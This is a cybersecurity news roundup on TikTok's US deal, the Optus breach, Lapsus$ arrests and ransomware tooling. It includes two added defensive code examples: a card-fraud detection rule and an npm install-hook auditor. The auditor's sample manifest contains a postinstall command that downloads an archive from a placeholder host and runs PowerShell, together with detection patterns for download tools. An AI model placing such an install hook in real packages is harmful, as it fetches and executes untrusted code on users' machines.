Biden Admin Reportedly Has a Deal with TikTok to Address Some of the App's Security Concerns
TikTok tentatively faces UK fine for failing to sufficiently protect children's data, Major Optus breach creates a storm in OZ, UK arrests teen who may be behind Uber, Rockstar Games hacks, more
In a move to alleviate some of the ever-mounting national security concerns about Beijing's ability to snoop through Chinese-owned technology, the Biden administration and the popular video app TikTok have reportedly drafted a preliminary agreement to address some of the concerns swirling around the app.
The two sides reportedly hammered out the foundations of a deal in which TikTok would change its data security and governance without requiring its owner, the Chinese internet giant ByteDance, to sell it. However, two sources with knowledge of the matter say the Justice Department is leading the negotiations with TikTok, and its number two official, Lisa Monaco, has concerns that the terms are not tough enough on China.
Indicating that a final resolution could drag on for months, two sources say that the Treasury Department is also skeptical that the potential agreement with TikTok can sufficiently resolve national security issues. TikTok has been negotiating with representatives of the Committee on Foreign Investment in the United States, or CFIUS, a group of federal agencies that reviews investments by foreign entities in American companies, to resolve concerns that the app puts national security at risk. CFIUS would also have to sign off on an agreement. (Lauren Hirsch, David McCabe, Katie Benner, and Glenn Thrush / New York Times)
Chinese-owned video app TikTok faces a possible fine of 27 million pounds ($28.9 million) after the UK’s privacy watchdog, the Information Commissioner’s Office (ICO), provisionally found the company may have breached data protection rules by failing to protect children’s data sufficiently.
The ICO said it issued TikTok with a notice of intent, laying out its plans for a potential fine and its findings. The authority’s provisional findings include that TikTok probably failed to get the necessary parental consent from minors that use its platform and processed some data without legal grounds.
A separate probe in Ireland, TikTok's EU base, into the company's alleged misuse of children's data is also in its final stages. (Stephanie Bodini / Bloomberg)
A hacker is demanding that Australian telco Optus pay US$1 million (A$1.5 million) in cryptocurrency, or they will leak sensitive information about millions of Australians that they claim to have obtained in a sophisticated hack.
The hacker claims to have significant data about 11.2 million Optus customers, including their names, dates of birth, phone numbers, email addresses, and, for a subset of customers, addresses and ID document numbers such as driver’s licenses or passport numbers.
Last week Optus revealed that the data of 9.8 million Australians had been breached, and the following morning, the company’s CEO, Kelly Bayer Rosmarin, made an emotional apology. The Australian Federal Police said they had launched Operation Hurricane, a global hunt to identify the hackers behind the massive Optus cyberattack.
A law firm, Slater and Gordon, announced it is investigating a class action against the telco over the data breach, and Home Affairs Minister Clare O’Neil has criticized the company for failing to stop a “basic” hack and for following up with a response that was “not adequate.” O’Neil also said the Australian government is considering stricter cybersecurity rules for telecommunications companies.
Optus disputed suggestions the hack was due to “human error” and signaled its move to offer credit monitoring was not the end of customer support and flagged an openness to reform of data rules. (Alex Turner-Cohen / News.com, Matthew Knott and Nick Bonyhady / Sydney Morning Herald, and Rod McGuirk / Associated Press)
Related: The Persian Pasdaran, NT News, DataBreachToday.com, The Guardian, ABC.net.au, ABC.net.au, Sydney Morning Herald, Daily Mail, Teiss, The Register, Channel News, IT Wire, News.com.au, The New Daily, Startup Daily, DealStreetAsia, DataBreachToday.com, PerthNow, ARN, Security News | Tech Times, gHacks, Reuters, Optus.com.au, News.com.au, ARN, Security News | Tech Times, Daily Mail, WA Today, Cyber.gov.au
Last week, UK law enforcement arrested a teenager on suspicion of hacking as part of an investigation believed to be tied to the Lapsus$ hacking group, which is suspected to be behind recent cyberattacks on Uber, Rockstar Games, and 2K.
City of London Police said the 17-year-old, from Oxfordshire, was detained as part of an inquiry supported by the UK's National Cyber Crime Unit. During previous attacks, the Lapsus$ hacking group was said to be led by a threat actor named White or BreachBase, who was allegedly doxxed as a 16-year-old from the UK. (BBC News and Lawrence Abrams / Bleeping Computer)
The cyber department of Ukraine's Security Service (SSU) took down a group of hackers that stole accounts of about 30 million individuals and sold them on the dark web.
The SSU says that the threat actor offered data packs purchased in bulk by pro-Kremlin propagandists, who then used the accounts to spread fake news on social media, instill panic, and cause destabilization in Ukraine and other countries. The hackers used anonymous dark web markets to sell this information and receive payments via YuMoney, Qiwi, and WebMoney, which are prohibited in Ukraine.
The number of individuals arrested remains undisclosed, but all of them are facing criminal charges for the unauthorized sale or distribution of information with limited access stored in computers and networks. These charges carry multi-year prison sentences. (Bill Toulas / Bleeping Computer)
Researchers at the University of Wisconsin-Madison discovered troubling gaps in the third-party app security model of both Slack and Teams that range from a lack of review of the apps’ code to default settings that allow any user to install an app for an entire workspace.
Even though Slack and Teams apps are limited by the permissions they seek approval for upon installation, the researchers’ survey of those safeguards found that hundreds of apps' permissions would nonetheless allow them to potentially post messages as a user, hijack the functionality of other legitimate apps, or even, in a handful of cases, access content in private channels when no such permission was granted.
Microsoft declined to comment until it could speak to the researchers, although the researchers say they communicated with Microsoft about their findings before publication. Slack says that a collection of approved apps available in its Slack App Directory receives security reviews before inclusion and is monitored for any suspicious behavior. (Andy Greenberg / Wired)
Researchers at Symantec say that Coreid, the ransomware-as-a-service (RaaS) group behind the Noberus ransomware, is adding tooling to its arsenal to steal data and credentials from compromised networks.
An extensively updated version of the Exmatter data exfiltration tool was seen last month in Noberus ransomware infections, and at least one Noberus affiliate was detected using Eamfo. This info-stealing malware connects to the SQL database in which a victim's Veeam backup software stores credentials.
Noberus, also known as BlackCat and ALPHV, is a successor to the notorious Darkside (used in the Colonial Pipeline attack) and later BlackMatter ransomware strains. (Jeff Burt / The Register)
Google’s Mandiant cybersecurity group has observed apparent coordination between pro-Russian hacking groups, ostensibly comprising patriotic citizen hackers, and cyber break-ins by Russia’s military intelligence agency or GRU.
In four instances, Mandiant says it observed hacking activity linked to the GRU in which malicious “wiper” software was installed on a victim’s network. The initial wiper software caused disruption by destroying computer systems across the organization. Following this disruption, the hacktivists published data stolen from the same organizations.
Mandiant says three pro-Russian hacktivist groups, XakNet Team, Infoccentr, and CyberArmyofRussia_Reborn, have been involved in the activity. (Robert McMillan and Dustin Volz / Wall Street Journal)
ReasonLabs exposed a massive operation that has reportedly siphoned millions of dollars from the credit cards of tens of millions of victims since its launch in 2019.
The site operators, thought to originate from Russia, operate an extensive network of bogus dating and customer support websites and use them to charge credit cards bought on the dark web. Most of the cards used in the operation belong to people in the United States, but they also bought cards from French-speaking countries.
The operation has flown under the radar by charging the cards either by using an API or manually, while the site operators are cautious not to trigger anti-fraud alarms and also to extend the time before the victim realizes the charges. They charge small amounts, use generic names that might blend with the victim's spending habits, use recurring payments with the same amount, and avoid performing test transactions. (Bill Toulas / Bleeping Computer)
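The evasion pattern described above (small amounts, bland merchant names, identical recurring charges, no test transactions) is exactly what an issuer-side review rule can key on. The following added example, which is not part of the Metacurity post or the ReasonLabs report, groups a cardholder's charges by merchant and amount and flags small, identically priced charges from a merchant the cardholder has no prior history with that recur at roughly monthly intervals. The transaction data, merchant names, thresholds and the `known_merchants` history are all constructed assumptions for illustration.

```python
"""Flag small, identical, recurring charges from merchants a cardholder has
never used before. Added example; thresholds and sample data are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date

# Assumed thresholds: charges at or under $25.00, repeated at least twice,
# with every gap between consecutive charges in a 25-35 day "monthly" window.
SMALL_AMOUNT_CENTS = 2500
MIN_REPEATS = 2
RECURRING_GAP_DAYS = (25, 35)


@dataclass(frozen=True)
class Charge:
    card: str          # opaque card identifier, never the PAN
    merchant: str      # merchant descriptor as it appears on the statement
    amount_cents: int  # integer cents avoids float rounding noise
    posted: date


def recurring_small_charges(charges, known_merchants):
    """Return a list of review cases.

    known_merchants maps card id -> set of merchants seen in the cardholder's
    established history; charges from those merchants are never flagged.
    Each case is a dict with card, merchant, amount_cents and the sorted
    posting dates of the matching charges.
    """
    by_key = defaultdict(list)
    for c in charges:
        by_key[(c.card, c.merchant, c.amount_cents)].append(c.posted)

    lo, hi = RECURRING_GAP_DAYS
    cases = []
    for (card, merchant, amount), dates in by_key.items():
        if amount > SMALL_AMOUNT_CENTS:
            continue  # not the "stay under the radar" size band
        if merchant in known_merchants.get(card, set()):
            continue  # cardholder has used this merchant before
        dates.sort()
        if len(dates) < MIN_REPEATS:
            continue  # a single charge is not a recurring pattern
        gaps = [(b - a).days for a, b in zip(dates, dates[1:])]
        if all(lo <= g <= hi for g in gaps):
            cases.append({"card": card, "merchant": merchant,
                          "amount_cents": amount, "dates": dates})
    return cases


# Constructed sample: one legitimate cardholder history plus one suspicious
# $9.99 charge that repeats every 30 days under a generic-looking descriptor.
KNOWN_MERCHANTS = {"card-A": {"GROCER MART", "FUEL STOP"}}
SAMPLE_CHARGES = [
    Charge("card-A", "GROCER MART", 8410, date(2022, 6, 1)),
    Charge("card-A", "GROCER MART", 7325, date(2022, 6, 15)),
    Charge("card-A", "FUEL STOP", 4500, date(2022, 6, 20)),
    Charge("card-A", "ONLINE SERVICES LLC", 999, date(2022, 6, 3)),
    Charge("card-A", "ONLINE SERVICES LLC", 999, date(2022, 7, 3)),
    Charge("card-A", "ONLINE SERVICES LLC", 999, date(2022, 8, 2)),
    Charge("card-A", "CORNER CAFE", 450, date(2022, 7, 9)),      # one-off, ignored
    Charge("card-A", "ONLINE SUPPORT CO", 1200, date(2022, 5, 1)),
    Charge("card-A", "ONLINE SUPPORT CO", 1200, date(2022, 5, 3)),  # 2-day gap, not monthly
]


def demo():
    """Run the rule over the constructed sample and return the review cases."""
    return recurring_small_charges(SAMPLE_CHARGES, KNOWN_MERCHANTS)


if __name__ == "__main__":
    for case in demo():
        print(f"{case['card']}: {case['merchant']} "
              f"${case['amount_cents'] / 100:.2f} x{len(case['dates'])}")
```

The output is a review queue, not a block decision: a legitimate new subscription produces the same shape, so the rule should feed a cardholder notification or analyst review rather than an automatic decline. Extending it with merchant reputation or shared-descriptor clustering across many cards is where the real signal against an operation of this scale would come from.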
Researchers at Check Point say the persecuted Chinese Muslim Uyghur community was targeted with an Android-based malware campaign for over seven years.
The Android spyware is called MobileOrder and has been used in various forms since 2015. Check Point attributed the campaign to a group they named “Scarlet Mimic.” The campaign uses spear-phishing techniques disguised in Islamic artifacts, such as books, pictures, and audio files.
Check Point was unable to tie the campaign to any specific country or group, but Palo Alto earlier said the same group had “motivations similar to the stated position of the Chinese government in relation to these targets is involved.” (Jonathan Greig / Cyberscoop)
Researchers at ReversingLabs found a malicious NPM package masquerading as the legitimate software library for Material Tailwind, indicating attempts by threat actors to distribute malicious code in open-source software repositories.
While posing as a helpful tool, the rogue package has an automatic post-install script engineered to download a password-protected ZIP archive file containing a Windows executable capable of running PowerShell scripts. The now-removed package, named material-tailwindcss, has been downloaded 320 times to date, all of which occurred on or after September 15, 2022. (Ravie Lakshmanan / The Hacker News)
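Because the malicious behaviour rides on an npm lifecycle hook, the cheapest defensive check is to audit every package.json in a dependency tree for install-time scripts before trusting it. The following added example, which is not part of the Metacurity post or the ReversingLabs research, reads a manifest, lists any preinstall/install/postinstall/prepare hooks, and highlights hook commands that fetch remote content, unpack archives or invoke PowerShell. The sample manifest, the package name `example-typosquat`, the URL and the regular-expression heuristics are constructed assumptions, not signatures for the real package.

```python
"""Audit npm package manifests for lifecycle install scripts.

Added example: flags packages whose package.json declares install-time
hooks and highlights hook commands with download, unpack or PowerShell
behaviour. The sample manifest and patterns below are constructed.
"""
import json
import os
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed review heuristics, not a vendor signature set.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|fetch\()", re.I),
    "archive_unpack": re.compile(r"\b(unzip|tar\s+-?x|Expand-Archive|7z)\b", re.I),
    "powershell": re.compile(r"\b(powershell|pwsh)\b", re.I),
    "node_eval": re.compile(r"\b(node\s+-e|eval\()", re.I),
}


def audit_manifest(manifest: dict) -> dict:
    """Return {hook_name: [pattern_name, ...]} for each lifecycle hook present.

    A hook with an empty list is present but matched no suspicious pattern.
    """
    findings = {}
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        findings[hook] = hits
    return findings


def risk_level(findings: dict) -> str:
    """'none' (no install hooks), 'review' (hooks, no hits), 'high' (hits)."""
    if not findings:
        return "none"
    if any(findings.values()):
        return "high"
    return "review"


def audit_node_modules(root: str) -> dict:
    """Walk an installed node_modules tree and audit every package.json.

    Returns {relative_package_path: (risk_level, findings)} for packages that
    declare at least one lifecycle hook; clean packages are omitted.
    """
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash
        findings = audit_manifest(manifest)
        if findings:
            results[os.path.relpath(dirpath, root)] = (risk_level(findings), findings)
    return results


# Constructed sample manifest modelled on the behaviour described in the
# article: a post-install hook that downloads an archive and runs PowerShell.
SAMPLE_MANIFEST = json.loads("""
{
  "name": "example-typosquat",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -sSL https://example.invalid/payload.zip -o p.zip && unzip -P secret p.zip && powershell -File run.ps1",
    "test": "jest"
  }
}
""")


if __name__ == "__main__":
    f = audit_manifest(SAMPLE_MANIFEST)
    print(SAMPLE_MANIFEST["name"], risk_level(f), f)
```

In CI this pairs well with `npm ci --ignore-scripts`, which installs without running any lifecycle hooks so the tree can be audited before anything executes; a `review` result is common for packages with native build steps, so the rule is a triage filter rather than a verdict.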
Senators Gary Peters (D-MI) and Rob Portman (R-OH), the top Democrat and Republican on the Senate Homeland Security Committee, introduced new legislation, the Securing Open Source Software Act, to protect open-source software from cyberattacks while evaluating how federal agencies throughout the government are using open source code.
Under the bill, the Cybersecurity and Infrastructure Security Agency would hire open-source experts and develop a framework to assess open-source code risks within one year. CISA would also be required to conduct annual government-wide monitoring of open-source code components and study whether its new open-source risk framework could apply to the private sector and critical infrastructure industries within two years of its publication. (Chris Riotta / FCW)